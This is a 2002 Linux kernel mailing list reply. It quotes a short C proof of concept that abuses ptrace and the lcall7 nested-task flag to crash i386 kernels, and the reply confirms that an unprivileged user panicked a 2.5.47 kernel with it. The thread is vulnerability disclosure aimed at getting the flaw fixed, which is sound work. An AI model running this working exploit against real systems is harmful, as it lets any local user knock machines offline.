RE: FW: i386 Linux kernel DoS (clarification)

Petr Vandrovec (VANDROVE@vc.cvut.cz)
Wed, 13 Nov 2002 21:36:47 +0100


On 13 Nov 02 at 11:23, Leif Sawyer wrote:
> #include <sys/ptrace.h>
>
> struct user_regs_struct {
> long ebx, ecx, edx, esi, edi, ebp, eax;
> unsigned short ds, __ds, es, __es;
> unsigned short fs, __fs, gs, __gs;
> long orig_eax, eip;
> unsigned short cs, __cs;
> long eflags, esp;
> unsigned short ss, __ss;
> };
>
> int main( void )
> {
> int pid;
> char dos[] = "\x9A\x00\x00\x00\x00\x07\x00";
> void (* lcall7)( void ) = (void *) dos;
> struct user_regs_struct d;
>
> if( ! ( pid = fork() ) )
> {
> usleep( 1000 );
> (* lcall7)();
> }
> else
> {
> ptrace( PTRACE_ATTACH, pid, 0, 0 );
> while( 1 )
> {
> wait( 0 );
> ptrace( PTRACE_GETREGS, pid, 0, &d );
> d.eflags |= 0x4100; /* set TF and NT */
> ptrace( PTRACE_SETREGS, pid, 0, &d );
> ptrace( PTRACE_SYSCALL, pid, 0, 0 );
> }
> }
>
> return 1;
> }
>
> At the beginning I thought only kernels <= 2.4.18 were affected; but it
> appeared that both kernels 2.4.19 and 2.4.20-rc1 are vulnerable as well.
> The flaw seems to be related to the kernel's handling of the nested task
> (NT) flag inside a lcall7.

2.5.47-current-bk, run as mere user: Kernel panic: Attempted to kill init!
Next time I'll trust you.
Petr Vandrovec
vandrove@vc.cvut.cz

-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at http://vger.kernel.org/majordomo-info.html
Please read the FAQ at http://www.tux.org/lkml/